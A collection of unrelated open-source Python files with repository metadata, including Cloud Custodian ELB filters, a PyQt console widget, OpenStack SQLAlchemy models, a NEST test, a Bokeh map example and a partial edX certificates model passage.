client.modify_load_balancer_attributes(LoadBalancerName=elb_name,
LoadBalancerAttributes={
'AccessLog': {
'Enabled': False}
})
return resources
def is_ssl(b):
for ld in b['ListenerDescriptions']:
if ld['Listener']['Protocol'] in ('HTTPS', 'SSL'):
return True
return False
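# For example (illustrative listener data), is_ssl returns True for a balancer
# like:
#   {'ListenerDescriptions': [{'Listener': {'Protocol': 'HTTPS'}}]}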
@filters.register('security-group')
class SecurityGroupFilter(net_filters.SecurityGroupFilter):
"""ELB security group filter"""
RelatedIdsExpression = "SecurityGroups[]"
@filters.register('subnet')
class SubnetFilter(net_filters.SubnetFilter):
"""ELB subnet filter"""
RelatedIdsExpression = "Subnets[]"
filters.register('network-location', net_filters.NetworkLocation)
@filters.register('instance')
class Instance(ValueFilter):
"""Filter ELB by an associated instance value(s)
:example:
.. code-block:: yaml
policies:
- name: elb-image-filter
resource: elb
filters:
- type: instance
key: ImageId
value: ami-01ab23cd
"""
schema = type_schema('instance', rinherit=ValueFilter.schema)
annotate = False
def get_permissions(self):
return self.manager.get_resource_manager('ec2').get_permissions()
def process(self, resources, event=None):
self.elb_instances = {}
instances = []
for r in resources:
instances.extend([i['InstanceId'] for i in r['Instances']])
for i in self.manager.get_resource_manager(
'ec2').get_resources(list(instances)):
self.elb_instances[i['InstanceId']] = i
return super(Instance, self).process(resources, event)
def __call__(self, elb):
matched = []
for i in elb['Instances']:
instance = self.elb_instances[i['InstanceId']]
if self.match(instance):
matched.append(instance)
if not matched:
return False
elb['c7n:MatchedInstances'] = matched
return True
@filters.register('is-ssl')
class IsSSLFilter(Filter):
"""Filters ELB that are using a SSL policy
:example:
.. code-block:: yaml
policies:
- name: elb-using-ssl
resource: elb
filters:
- type: is-ssl
"""
schema = type_schema('is-ssl')
def process(self, balancers, event=None):
return [b for b in balancers if is_ssl(b)]
@filters.register('ssl-policy')
class SSLPolicyFilter(Filter):
"""Filter ELBs on the properties of SSLNegotation policies.
TODO: Only works on custom policies at the moment.
whitelist: filter all policies containing permitted protocols
blacklist: filter all policies containing forbidden protocols
    Cannot specify both whitelist & blacklist in the same policy. These must
    be done separately (separate policy statements).
Likewise, if you want to reduce the consideration set such that we only
compare certain keys (e.g. you only want to compare the `Protocol-` keys),
you can use the `matching` option with a regular expression:
:example:
.. code-block:: yaml
policies:
- name: elb-ssl-policies
resource: elb
filters:
- type: ssl-policy
blacklist:
- "Protocol-SSLv2"
- "Protocol-SSLv3"
- name: elb-modern-tls
resource: elb
filters:
- type: ssl-policy
matching: "^Protocol-"
whitelist:
- "Protocol-TLSv1.1"
- "Protocol-TLSv1.2"
"""
schema = {
'type': 'object',
'additionalProperties': False,
'oneOf': [
{'required': ['type', 'whitelist']},
{'required': ['type', 'blacklist']}
],
'properties': {
'type': {'enum': ['ssl-policy']},
'matching': {'type': 'string'},
'whitelist': {'type': 'array', 'items': {'type': 'string'}},
'blacklist': {'type': 'array', 'items': {'type': 'string'}}
}
}
permissions = ("elasticloadbalancing:DescribeLoadBalancerPolicies",)
def validate(self):
if 'whitelist' in self.data and 'blacklist' in self.data:
raise FilterValidationError(
"cannot specify whitelist and black list")
if 'whitelist' not in self.data and 'blacklist' not in self.data:
raise FilterValidationError(
"must specify either policy blacklist or whitelist")
if ('blacklist' in self.data and
not isinstance(self.data['blacklist'], list)):
raise FilterValidationError("blacklist must be a list")
if 'matching' in self.data:
# Sanity check that we can compile
try:
re.compile(self.data['matching'])
except re.error as e:
raise FilterValidationError(
"Invalid regex: %s %s" % (e, self.data))
return self
def process(self, balancers, event=None):
balancers = [b for b in balancers if is_ssl(b)]
active_policy_attribute_tuples = (
self.create_elb_active_policy_attribute_tuples(balancers))
whitelist = set(self.data.get('whitelist', []))
blacklist = set(self.data.get('blacklist', []))
invalid_elbs = []
if 'matching' in self.data:
regex = self.data.get('matching')
filtered_pairs = []
for (elb, active_policies) in active_policy_attribute_tuples:
filtered_policies = [policy for policy in active_policies if
bool(re.match(regex, policy, flags=re.IGNORECASE))]
if filtered_policies:
filtered_pairs.append((elb, filtered_policies))
active_policy_attribute_tuples = filtered_pairs
if blacklist:
for elb, active_policies in active_policy_attribute_tuples:
if len(blacklist.intersection(active_policies)) > 0:
elb["ProhibitedPolicies"] = list(
blacklist.intersection(active_policies))
invalid_elbs.append(elb)
elif whitelist:
for elb, active_policies in active_policy_attribute_tuples:
if len(set(active_policies).difference(whitelist)) > 0:
elb["ProhibitedPolicies"] = list(
set(active_policies).difference(whitelist))
invalid_elbs.append(elb)
return invalid_elbs
def create_elb_active_policy_attribute_tuples(self, elbs):
"""
Returns a list of tuples of active SSL policies attributes
for each elb [(elb['Protocol-SSLv1','Protocol-SSLv2',...])]
"""
elb_custom_policy_tuples = self.create_elb_custom_policy_tuples(elbs)
active_policy_attribute_tuples = (
self.create_elb_active_attributes_tuples(elb_custom_policy_tuples))
return active_policy_attribute_tuples
def create_elb_custom_policy_tuples(self, balancers):
"""
creates a list of tuples (elb,[sslpolicy1,sslpolicy2...])
for all custom policies on the ELB
"""
elb_policy_tuples = []
for b in balancers:
policies = []
for ld in b['ListenerDescriptions']:
for p in ld['PolicyNames']:
policies.append(p)
elb_policy_tuples.append((b, policies))
return elb_policy_tuples
def create_elb_active_attributes_tuples(self, elb_policy_tuples):
"""
creates a list of tuples for all attributes that are marked
as "true" in the load balancer's polices, e.g.
(myelb,['Protocol-SSLv1','Protocol-SSLv2'])
"""
active_policy_attribute_tuples = []
with self.executor_factory(max_workers=2) as w:
futures = []
for elb_policy_set in chunks(elb_policy_tuples, 50):
futures.append(
w.submit(self.process_elb_policy_set, elb_policy_set))
for f in as_completed(futures):
if f.exception():
self.log.error(
"Exception processing elb policies \n %s" % (
f.exception()))
continue
for elb_policies in f.result():
active_policy_attribute_tuples.append(elb_policies)
return active_policy_attribute_tuples
@worker
def process_elb_policy_set(self, elb_policy_set):
results = []
client = local_session(self.manager.session_factory).client('elb')
for (elb, policy_names) in elb_policy_set:
elb_name = elb['LoadBalancerName']
try:
policies = client.describe_load_balancer_policies(
LoadBalancerName=elb_name,
PolicyNames=policy_names)['PolicyDescriptions']
except ClientError as e:
if e.response['Error']['Code'] in [
'LoadBalancerNotFound', 'PolicyNotFound']:
continue
raise
active_lb_policies = []
ssl_policies = []
for p in policies:
if p['PolicyTypeName'] != 'SSLNegotiationPolicyType':
continue
ssl_policies.append(p['PolicyName'])
active_lb_policies.extend(
[policy_description['AttributeName']
for policy_description in
p['PolicyAttributeDescriptions']
if policy_description['AttributeValue'] == 'true']
)
elb['c7n.ssl-policies'] = ssl_policies
results.append((elb, active_lb_policies))
return results
@filters.register('healthcheck-protocol-mismatch')
class HealthCheckProtocolMismatch(Filter):
"""Filters ELB that have a healtch check protocol mismatch
The mismatch occurs if the ELB has a different protocol to check than
the associated instances allow to determine health status.
:example:
.. code-block:: yaml
policies:
- name: elb-healthcheck-mismatch
resource: elb
filters:
- type: healthcheck-protocol-mismatch
"""
schema = type_schema('healthcheck-protocol-mismatch')
def __call__(self, load_balancer):
health_check_protocol = (
load_balancer['HealthCheck']['Target'].split(':')[0])
listener_descriptions = load_balancer['ListenerDescriptions']
if len(listener_descriptions) == 0:
return True
# check if any of the protocols in the ELB match the health
# check. There is only 1 health check, so if there are
# multiple listeners, we only check if at least one of them
# matches
protocols = [listener['Listener']['InstanceProtocol']
for listener in listener_descriptions]
return health_check_protocol in protocols
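    # For example (hypothetical values): a HealthCheck Target of
    # "HTTP:8080/health" yields health_check_protocol == 'HTTP', which
    # matches any listener whose InstanceProtocol is 'HTTP'.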
@filters.register('default-vpc')
class DefaultVpc(DefaultVpcBase):
""" Matches if an elb database is in the default vpc
:example:
.. code-block:: yaml
policies:
- name: elb-default-vpc
resource: elb
filters:
- type: default-vpc
"""
schema = type_schema('default-vpc')
def __call__(self, elb):
return elb.get('VPCId') and self.match(elb.get('VPCId')) or False
class ELBAttributeFilterBase(object):
""" Mixin base class for filters that query LB attributes.
"""
def initialize(self, elbs):
def _process_attributes(elb):
if 'Attributes' not in elb:
client = local_session(
self.manager.session_factory).client('elb')
results = client.describe_load_balancer_attributes(
LoadBalancerName=elb['LoadBalancerName'])
elb['Attributes'] = results['LoadBalancerAttributes']
with self.manager.executor_factory(max_workers=2) as w:
list(w.map(_process_attributes, elbs))
@filters.register('is-logging')
class IsLoggingFilter(Filter, ELBAttributeFilterBase):
"""Matches ELBs that are logging to S3.
bucket and prefix are optional
:example:
.. code-block:: yaml
policies:
- name: elb-is-logging-test
resource: elb
filters:
- type: is-logging
- name: elb-is-logging-bucket-and-prefix-test
resource: elb
filters:
- type: is-logging
bucket: prodlogs
prefix: elblogs
"""
permissions = ("elasticloadbalancing:DescribeLoadBalancerAttributes",)
schema = type_schema('is-logging',
bucket={'type': 'string'},
prefix={'type': 'string'}
)
def process(self, resources, event=None):
self.initialize(resources)
bucket_name = self.data.get('bucket', None)
bucket_prefix = self.data.get('prefix', None)
return [elb for elb in resources
if elb['Attributes']['AccessLog']['Enabled'] and
(not bucket_name or bucket_name == elb['Attributes'][
'AccessLog'].get('S3BucketName', None)) and
(not bucket_prefix or bucket_prefix == elb['Attributes'][
'AccessLog'].get('S3BucketPrefix', None))
]
@filters.register('is-not-logging')
class IsNotLoggingFilter(Filter, ELBAttributeFilterBase):
""" Matches ELBs that are NOT logging to S3.
or do not match the optional bucket and/or prefix.
:example:
.. code-block:: yaml
policies:
- name: elb-is-not-logging-test
resource: elb
filters:
- type: is-not-logging
- name: is-not-logging-bucket-and-prefix-test
resource: app-elb
filters:
- type: is-not-logging
bucket: prodlogs
prefix: alblogs
"""
permissions = ("elasticloadbalancing:DescribeLoadBalancerAttributes",)
schema = type_schema('is-not-logging',
bucket={'type': 'string'},
prefix={'type': 'string'}
)
def process(self, resources, event=None):
self.initialize(resources)
bucket_name = self.data.get('bucket', None)
bucket_prefix = self.data.get('prefix', None)
return [elb for elb in resources
if not elb['Attributes']['AccessLog']['Enabled'] or
(bucket_name and bucket_name != elb['Attributes'][
'AccessLog'].get(
'S3BucketName', None)) or
(bucket_prefix and bucket_prefix != elb['Attributes'][
'AccessLog'].get(
                    'S3BucketPrefix', None))
]
|
scotwk/cloud-custodian
|
c7n/resources/elb.py
|
Python
|
apache-2.0
| 29,736 | 0.000303 |
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 27 18:31:59 2017
@author: katsuya.ishiyama
"""
from numpy import random
# Definition of module level constants
SUCCESS_CODE = 1
FAILURE_CODE = 0
class Strategy():
def __init__(self, n):
_success_probability = _generate_success_probability(n)
_strategy = {i: p for i, p in enumerate(_success_probability, 1)}
self._n = n
self.strategy = _strategy
self.stock_of_strategy = list(_strategy.keys())
self.tried_strategy = []
self.current_strategy = None
self.previous_strategy = None
self.count_same_strategy = 0
self._result_of_trial = None
def choose_strategy(self):
if not self.stock_of_strategy:
raise ValueError('There is no strategy in stock.')
_chosen_id = random.choice(self.stock_of_strategy, 1)[0]
self.previous_strategy = self.current_strategy
self.current_strategy = _chosen_id
self.count_same_strategy = 0
self.stock_of_strategy.remove(_chosen_id)
_chosen_strategy = {
'chosen_strategy': _chosen_id,
'success_probability': self._get_success_probability()
}
return _chosen_strategy
def _get_success_probability(self):
return self.strategy[self.current_strategy]
def try_strategy(self):
if not self.current_strategy:
raise ValueError('No strategy is chosen.')
self.tried_strategy.append(self.current_strategy)
self._result_of_trial = _get_trial_result(
p=self._get_success_probability()
)
if self.current_strategy == self.previous_strategy:
self.count_same_strategy += 1
return self._result_of_trial
def _get_trial_result(p):
_trial_result = random.choice([FAILURE_CODE, SUCCESS_CODE], size=1, p=[1 - p, p])
return _trial_result[0]
def _generate_success_probability(size):
return random.sample(size)
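# A minimal usage sketch (illustrative numbers; uses only the API above):
#
#     s = Strategy(5)
#     chosen = s.choose_strategy()
#     print(chosen['chosen_strategy'], chosen['success_probability'])
#     if s.try_strategy() == SUCCESS_CODE:
#         print('strategy succeeded')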
|
Katsuya-Ishiyama/simulation
|
strategy/strategy.py
|
Python
|
mit
| 2,013 | 0.00149 |
import urllib2
from HTMLParser import HTMLParser
from traceback import print_exc
from sys import stderr
class _DeHTMLParser(HTMLParser):
'''
    Parse page elements with HTMLParser and collect image links.
'''
def __init__(self):
HTMLParser.__init__(self)
self.img_links = []
def handle_starttag(self, tag, attrs):
if tag == 'img':
# print(attrs)
try:
if ('pic_type','0') in attrs:
for name, value in attrs:
if name == 'src':
self.img_links.append(value)
except Exception as e:
print(e)
return self.img_links
def dehtml(text):
try:
parser = _DeHTMLParser()
parser.feed(text)
parser.close()
return parser.img_links
    except Exception:
print_exc(file=stderr)
return text
def main():
    html = urllib2.urlopen('http://tieba.baidu.com/p/2166231880')
    content = html.read()
    # Parse once and reuse the result instead of re-parsing the page.
    img_links = dehtml(content)
    print(img_links)
    # Download each image, numbering the files sequentially.
    for i, img_link in enumerate(img_links):
        img_content = urllib2.urlopen(img_link).read()
        path_name = str(i) + '.jpg'
        with open(path_name, 'wb') as f:
            f.write(img_content)
if __name__ == '__main__':
main()
|
luoxufeiyan/python
|
burness/0013/get_photos.py
|
Python
|
mit
| 1,039 | 0.043095 |
#!/usr/bin/env python2
""" This is the main module, used to launch the persistency engine """
#from persio import iohandler
import persui.persinterface as ui
def main():
""" Launches the user interface, and keeps it on."""
interface = ui.Persinterface()
while True:
interface.run()
if __name__ == '__main__':
main()
"""
def main_old():
keynames = ["A", "B"]
graph_data1 = [(0, 0, 0, 1), (0, 1, 2, 3)]
graph_data2 = [(2, 3, 0, 1), (0, 6, 2, 8)]
graph_data = [graph_data1, graph_data2]
name = "tree.xml"
root = iohandler.xh.createindex(keynames)
for i in xrange(2):
iohandler.xh.creategraph(root, graph_data[i], keynames[i], 2)
iohandler.xh.writexml(root, name)
"""
|
jepio/pers_engine
|
persengine.py
|
Python
|
gpl-2.0
| 733 | 0.002729 |
# -*- coding: utf-8 -*-
#
# test_get_sp_status.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Structural Plasticity GetStatus Test
------------------------------------
This tests the functionality of the GetStructuralPlasticityStatus
function
"""
import nest
import unittest
__author__ = 'sdiaz'
class TestGetStructuralPlasticityStatus(unittest.TestCase):
neuron_model = 'iaf_psc_alpha'
nest.CopyModel('static_synapse', 'synapse_ex')
nest.SetDefaults('synapse_ex', {'weight': 1.0, 'delay': 1.0})
nest.SetStructuralPlasticityStatus({
'structural_plasticity_synapses': {
'synapse_ex': {
'model': 'synapse_ex',
'post_synaptic_element': 'Den_ex',
'pre_synaptic_element': 'Axon_ex',
},
}
})
growth_curve = {
'growth_curve': "gaussian",
'growth_rate': 0.0001, # (elements/ms)
'continuous': False,
'eta': 0.0, # Ca2+
'eps': 0.05
}
'''
Now we assign the growth curves to the corresponding synaptic
elements
'''
synaptic_elements = {
'Den_ex': growth_curve,
'Den_in': growth_curve,
'Axon_ex': growth_curve,
}
nodes = nest.Create(neuron_model,
2,
{'synaptic_elements': synaptic_elements}
)
all = nest.GetStructuralPlasticityStatus()
print(all)
assert ('structural_plasticity_synapses' in all)
assert ('syn1' in all['structural_plasticity_synapses'])
assert ('structural_plasticity_update_interval' in all)
assert (all['structural_plasticity_update_interval'] == 1000)
sp_synapses = nest.GetStructuralPlasticityStatus(
'structural_plasticity_synapses'
)
print(sp_synapses)
syn = sp_synapses['syn1']
assert ('pre_synaptic_element' in syn)
assert ('post_synaptic_element' in syn)
assert (syn['pre_synaptic_element'] == 'Axon_ex')
assert (syn['post_synaptic_element'] == 'Den_ex')
sp_interval = nest.GetStructuralPlasticityStatus(
'structural_plasticity_update_interval'
)
print(sp_interval)
assert (sp_interval == 1000)
def suite():
test_suite = unittest.makeSuite(
TestGetStructuralPlasticityStatus,
'test'
)
return test_suite
if __name__ == '__main__':
unittest.main()
|
hakonsbm/nest-simulator
|
pynest/nest/tests/test_sp/test_get_sp_status.py
|
Python
|
gpl-2.0
| 3,006 | 0 |
from filer.apps import FilerConfig
class MyFilerConfig(FilerConfig):
verbose_name = "Dateiverwaltung"
|
n2o/dpb
|
dpb/apps.py
|
Python
|
mit
| 108 | 0 |
# Copyright (c) 2015 Aaron Kehrer
# Licensed under the terms of the MIT License
# (see fiddle/__init__.py for details)
import os
import unicodedata
from io import StringIO
from PyQt4 import QtCore, QtGui
from fiddle.config import EDITOR_FONT, EDITOR_FONT_SIZE
class PyConsoleTextBrowser(QtGui.QTextBrowser):
def __init__(self, parent=None, process=None):
super(PyConsoleTextBrowser, self).__init__(parent)
self.process = process
# The start position in the QTextBrowser document where new user input will be inserted
self._input_insert_pos = -1
self.history = []
self.history_idx = 0
self.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.setAcceptRichText(False)
self.setReadOnly(False)
self.setOpenExternalLinks(False)
self.setOpenLinks(False)
self.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse | QtCore.Qt.TextEditorInteraction)
def keyPressEvent(self, event):
if self.process is not None:
# Skip keys modified with Ctrl or Alt
if event.modifiers() != QtCore.Qt.ControlModifier and event.modifiers() != QtCore.Qt.AltModifier:
# Get the insert cursor and make sure it's at the end of the console
cursor = self.textCursor()
cursor.movePosition(QtGui.QTextCursor.End)
if self._input_insert_pos < 0:
self._input_insert_pos = cursor.position()
# Scroll view to end of console
self.setTextCursor(cursor)
self.ensureCursorVisible()
# Process the key event
if event.key() == QtCore.Qt.Key_Up:
# Clear any previous input
self._clear_insert_line(cursor)
# Get the history
if len(self.history) > 0:
self.history_idx -= 1
try:
cursor.insertText(self.history[self.history_idx])
except IndexError:
self.history_idx += 1
cursor.insertText('')
elif event.key() == QtCore.Qt.Key_Down:
# Clear any previous input
self._clear_insert_line(cursor)
# Get the history
if len(self.history) > 0 >= self.history_idx:
self.history_idx += 1
try:
cursor.insertText(self.history[self.history_idx])
except IndexError:
self.history_idx -= 1
cursor.insertText('')
elif event.key() == QtCore.Qt.Key_Return:
txt = self._select_insert_line(cursor)
self.process.write('{0}\n'.format(txt).encode('utf-8'))
# Reset the insert position
self._input_insert_pos = -1
# Update the history
self.history.append(txt)
self.history_idx = 0
# Pass the event on to the parent for handling
return QtGui.QTextBrowser.keyPressEvent(self, event)
def _clear_insert_line(self, cursor):
"""
Remove all the displayed text from the input insert line and clear the input buffer
"""
cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
cursor.removeSelectedText()
def _select_insert_line(self, cursor):
cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
txt = cursor.selectedText()
cursor.clearSelection()
return txt
class PyConsoleLineEdit(QtGui.QLineEdit):
"""
https://wiki.python.org/moin/PyQt/Adding%20tab-completion%20to%20a%20QLineEdit
http://www.saltycrane.com/blog/2008/01/how-to-capture-tab-key-press-event-with/
"""
def __init__(self):
super(PyConsoleLineEdit, self).__init__()
line_font = QtGui.QFont()
line_font.setFamily(EDITOR_FONT)
line_font.setPointSize(EDITOR_FONT_SIZE)
self.setFont(line_font)
self.history = []
self.history_idx = -1
def event(self, event):
if event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Tab:
if self.text().strip() == '':
self.setText(self.text() + ' ')
return True
elif event.key() == QtCore.Qt.Key_Up:
if len(self.history) > 0 and self.history_idx > 0:
self.history_idx -= 1
self.setText(self.history[self.history_idx])
return True
elif event.key() == QtCore.Qt.Key_Down:
if 0 < len(self.history) > self.history_idx:
self.history_idx += 1
try:
self.setText(self.history[self.history_idx])
except IndexError:
self.setText('')
return True
elif event.key() == QtCore.Qt.Key_Return:
try:
if self.history[-1] != self.text():
self.history.append(self.text())
except IndexError:
self.history.append(self.text())
self.history_idx = len(self.history)
return QtGui.QLineEdit.event(self, event)
return QtGui.QLineEdit.event(self, event)
|
akehrer/fiddle
|
fiddle/controllers/PyConsole.py
|
Python
|
gpl-3.0
| 5,579 | 0.001255 |
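A hypothetical wiring sketch (not part of the source): PyConsoleTextBrowser only ever calls self.process.write(), so any QProcess-like object works. Assuming PyQt4 as in the file above, a console could be attached to an interactive interpreter like this; the echo slot is an invented name for illustration.

# Hypothetical usage (PyQt4 assumed): run "python -i" in a QProcess and feed
# its output into the console browser defined above.
import sys
from PyQt4 import QtCore, QtGui

app = QtGui.QApplication(sys.argv)
proc = QtCore.QProcess()
proc.setProcessChannelMode(QtCore.QProcess.MergedChannels)  # merge stderr into stdout
console = PyConsoleTextBrowser(process=proc)

def echo_output():
    # Append whatever the child process printed to the console view.
    data = proc.readAllStandardOutput()
    console.insertPlainText(str(data))

proc.readyReadStandardOutput.connect(echo_output)
proc.start('python', ['-i'])
console.show()
sys.exit(app.exec_())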
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012 Cloudscaling Group, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models.
"""
import six
from sqlalchemy import Column, Integer
from sqlalchemy import DateTime
from sqlalchemy.orm import object_mapper
from solum.openstack.common.db.sqlalchemy import session as sa
from solum.openstack.common import timeutils
class ModelBase(object):
"""Base class for models."""
__table_initialized__ = False
def save(self, session=None):
"""Save this object."""
if not session:
session = sa.get_session()
        # NOTE(boris-42): This part of the code should look like:
# session.add(self)
# session.flush()
# But there is a bug in sqlalchemy and eventlet that
# raises NoneType exception if there is no running
# transaction and rollback is called. As long as
# sqlalchemy has this bug we have to create transaction
# explicitly.
with session.begin(subtransactions=True):
session.add(self)
session.flush()
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def get(self, key, default=None):
return getattr(self, key, default)
@property
def _extra_keys(self):
"""Specifies custom fields
Subclasses can override this property to return a list
of custom fields that should be included in their dict
representation.
For reference check tests/db/sqlalchemy/test_models.py
"""
return []
def __iter__(self):
columns = dict(object_mapper(self).columns).keys()
# NOTE(russellb): Allow models to specify other keys that can be looked
# up, beyond the actual db columns. An example would be the 'name'
# property for an Instance.
columns.extend(self._extra_keys)
self._i = iter(columns)
return self
def next(self):
n = six.advance_iterator(self._i)
return n, getattr(self, n)
def update(self, values):
"""Make the model object behave like a dict."""
for k, v in six.iteritems(values):
setattr(self, k, v)
def iteritems(self):
"""Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict(self)
joined = dict([(k, v) for k, v in six.iteritems(self.__dict__)
if not k[0] == '_'])
local.update(joined)
return six.iteritems(local)
class TimestampMixin(object):
created_at = Column(DateTime, default=lambda: timeutils.utcnow())
updated_at = Column(DateTime, onupdate=lambda: timeutils.utcnow())
class SoftDeleteMixin(object):
deleted_at = Column(DateTime)
deleted = Column(Integer, default=0)
def soft_delete(self, session=None):
"""Mark this object as deleted."""
self.deleted = self.id
self.deleted_at = timeutils.utcnow()
self.save(session=session)
|
alex/solum
|
solum/openstack/common/db/sqlalchemy/models.py
|
Python
|
apache-2.0
| 3,969 | 0 |
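A hypothetical usage sketch (names, engine, and session handling are assumptions, not from the source; an era-appropriate pre-1.4 SQLAlchemy is assumed): a concrete table combining the base class and mixins above with a declarative base. ModelBase.save() falls back to solum's session helper, so this sketch passes an explicit session instead.

# Hypothetical sketch: a concrete model built on the classes above.
from sqlalchemy import create_engine
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker

Base = declarative_base()

class Assembly(Base, ModelBase, TimestampMixin, SoftDeleteMixin):
    __tablename__ = 'assembly'
    id = Column(Integer, primary_key=True)
    name = Column(String(100))

engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

asm = Assembly(name='demo')
asm.save(session=session)         # explicit session, bypassing sa.get_session()
asm.soft_delete(session=session)  # sets deleted/deleted_at instead of removing the row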
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2018 David Arroyo Menéndez
# Author: David Arroyo Menéndez <davidam@gnu.org>
# Maintainer: David Arroyo Menéndez <davidam@gnu.org>
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
# This file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with GNU Emacs; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301 USA,
from bokeh.plotting import figure, show, output_file
from bokeh.tile_providers import CARTODBPOSITRON
output_file("tile.html")
# range bounds supplied in web mercator coordinates
p = figure(x_range=(-2000000, 6000000), y_range=(-1000000, 7000000),
x_axis_type="mercator", y_axis_type="mercator")
p.add_tile(CARTODBPOSITRON)
show(p)
|
davidam/python-examples
|
bokeh/openstreetmap.py
|
Python
|
gpl-3.0
| 1,245 | 0 |
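A small helper (an addition, not in the source) for deriving those web-mercator bounds from familiar longitude/latitude degrees, using the standard spherical-mercator formulas:

# Hypothetical helper: convert WGS84 lon/lat (degrees) to the web-mercator
# metres that the x_range/y_range above expect.
import math

def lonlat_to_mercator(lon, lat):
    k = 6378137.0  # earth radius used by the web-mercator projection [m]
    x = math.radians(lon) * k
    y = math.log(math.tan(math.pi / 4.0 + math.radians(lat) / 2.0)) * k
    return x, y

# Roughly the bounds used above:
print(lonlat_to_mercator(-18.0, -8.9))  # ~(-2000000, -1000000)
print(lonlat_to_mercator(53.9, 53.1))   # ~(6000000, 7000000)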
#!/usr/bin/env python
# coding=utf-8
from toughlogger.common import pyforms
from toughlogger.common.pyforms import rules
from toughlogger.common.pyforms.rules import button_style, input_style
password_update_form = pyforms.Form(
pyforms.Textbox("tra_user", description=u"管理员名", size=32, readonly="readonly", **input_style),
pyforms.Password("tra_user_pass", rules.len_of(6, 32), description=u"管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Password("tra_user_pass_chk", rules.len_of(6, 32), description=u"确认管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Button("submit", type="submit", html=u"<b>更新</b>", **button_style),
title=u"管理密码更新",
action="/password"
)
|
talkincode/toughlogger
|
toughlogger/console/handlers/password_forms.py
|
Python
|
agpl-3.0
| 789 | 0.006784 |
# -*- coding: utf-8 -*-
"""
Certificates are created for a student and an offering of a course.
When a certificate is generated, a unique ID is generated so that
the certificate can be verified later. The ID is a UUID4, so that
it can't be easily guessed and so that it is unique.
Certificates are generated in batches by a cron job, when a
certificate is available for download the GeneratedCertificate
table is updated with information that will be displayed
on the course overview page.
State diagram:
    [deleted,error,unavailable]      [error,downloadable]
              +                              +                        +
              |                              |                        |
              |                              |                        |
           add_cert                     regen_cert                del_cert
              |                              |                        |
              v                              v                        v
         [generating]                 [regenerating]             [deleting]
              +                              +                        +
              |                              |                        |
         certificate                    certificate              certificate
           created                    removed,created              deleted
              +------------------------------+------------------------+------->[error]
              |                              |                        |
              |                              |                        |
              v                              v                        v
        [downloadable]                [downloadable]               [deleted]
Eligibility:
Students are eligible for a certificate if they pass the course
with the following exceptions:
If the student has allow_certificate set to False in the student profile
he will never be issued a certificate.
If the user and course is present in the certificate whitelist table
then the student will be issued a certificate regardless of his grade,
unless he has allow_certificate set to False.
"""
from datetime import datetime
import uuid
from django.contrib.auth.models import User
from django.db import models, transaction
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.conf import settings
from django.utils.translation import ugettext_lazy
from model_utils import Choices
from model_utils.models import TimeStampedModel
from config_models.models import ConfigurationModel
from xmodule_django.models import CourseKeyField, NoneToEmptyManager
from util.milestones_helpers import fulfill_course_milestone
from course_modes.models import CourseMode
class CertificateStatuses(object):
deleted = 'deleted'
deleting = 'deleting'
downloadable = 'downloadable'
error = 'error'
generating = 'generating'
notpassing = 'notpassing'
regenerating = 'regenerating'
restricted = 'restricted'
unavailable = 'unavailable'
class CertificateWhitelist(models.Model):
"""
Tracks students who are whitelisted, all users
in this table will always qualify for a certificate
regardless of their grade unless they are on the
embargoed country restriction list
(allow_certificate set to False in userprofile).
"""
objects = NoneToEmptyManager()
user = models.ForeignKey(User)
course_id = CourseKeyField(max_length=255, blank=True, default=None)
whitelist = models.BooleanField(default=0)
class GeneratedCertificate(models.Model):
MODES = Choices('verified', 'honor', 'audit')
user = models.ForeignKey(User)
course_id = CourseKeyField(max_length=255, blank=True, default=None)
verify_uuid = models.CharField(max_length=32, blank=True, default='')
download_uuid = models.CharField(max_length=32, blank=True, default='')
download_url = models.CharField(max_length=128, blank=True, default='')
grade = models.CharField(max_length=5, blank=True, default='')
key = models.CharField(max_length=32, blank=True, default='')
distinction = models.BooleanField(default=False)
status = models.CharField(max_length=32, default='unavailable')
mode = models.CharField(max_length=32, choices=MODES, default=MODES.honor)
name = models.CharField(blank=True, max_length=255)
created_date = models.DateTimeField(
auto_now_add=True, default=datetime.now)
modified_date = models.DateTimeField(
auto_now=True, default=datetime.now)
